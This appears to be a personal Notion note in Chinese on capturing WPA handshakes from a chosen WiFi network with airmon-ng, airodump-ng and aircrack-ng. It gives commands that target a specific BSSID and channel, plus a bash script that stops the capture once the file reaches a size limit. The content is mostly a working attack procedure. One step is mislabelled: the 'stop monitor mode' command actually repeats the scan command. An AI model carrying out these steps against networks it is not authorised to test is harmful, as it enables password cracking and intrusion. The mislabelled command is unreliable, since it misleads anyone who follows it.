--- notion-id: c0de9c17-e8a7-4ed4-8c76-6abfcd4c4f8b --- **查看网卡名称**: `iwconfig ` **启动网卡镜像功能:** `sudo airmon-ng start wlan0` **停止网卡镜像功能:** `sudo airodump-ng wlan0mon` **扫描周围的 WiFi 网络**: `sudo airodump-ng wlan0mon` **判定是否存在握手包:** `aircrack-ng .cap` **选择目标网络并捕获握手包**: 记住[信道号]和[目标网络的BSSID] `sudo airodump-ng -c [信道号] --bssid [目标网络的BSSID] -w [输出文件名] wlan0mon` 案例: ```shell sudo airodump-ng -c 13 --bssid C8:5B:A0:9C:67:74 -w /home/kali/下载/output/output_$(date +%Y-%m-%d_%H) wlan0mon ``` `output_$(date +%Y-%m-%d_%H) ` 动态文件名 因为将不断获取数据使用脚本监控文件,当文件达到阈值将自动停止。 ==Tips:如果想桌面执行,需要创建启动器。== ```shell #!/bin/bash # 设置文件大小阈值(MB) threshold=10 # 设置捕获文件目录 output_dir="/home/kali/下载/output" echo "开始监控捕获文件大小..." # 输出捕获文件大小信息的位置下两行预留空间,并保存该位置 echo -e "\n\n" echo -ne "\033[s" # 监控捕获文件大小 while true; do capture_files=$(ls -t "$output_dir"/*.cap 2>/dev/null) if [ -z "$capture_files" ]; then # 如果没有找到捕获文件,则回到之前保存的位置,向上两行,清除并输出信息 echo -ne "\033[u\033[2A\033[J未找到捕获文件,继续等待...\n\n" sleep 5 continue fi latest_capture=$(echo "$capture_files" | head -n 1) file_size_bytes=$(du -b "$latest_capture" | cut -f1) file_size_mb=$(echo "scale=2; $file_size_bytes / 1024 / 1024" | bc) progress=$(echo "scale=2; $file_size_mb / $threshold * 100" | bc) # 回到之前保存的位置,向上两行,清除这两行内容 echo -ne "\033[u\033[2A\033[J" # 输出新的捕获文件大小信息和进度条,使用ANSI转移修改颜色和指定光标位置 echo -e "捕获文件 $latest_capture , 大小为:\033[32m$file_size_mb MB\033[0m" echo -n "[" for ((i=0; i<=$(echo "$progress/2" | bc); i++)); do echo -n "#"; done for ((i=$(echo "$progress/2" | bc); i<50; i++)); do echo -n " "; done echo "] $progress%" if [ "$(echo "$file_size_mb >= $threshold" | bc)" -eq 1 ]; then echo -e "\n捕获文件大小超过阈值,停止 airodump-ng 进程..." sudo pkill -f "airodump-ng" break fi sleep 5 done ```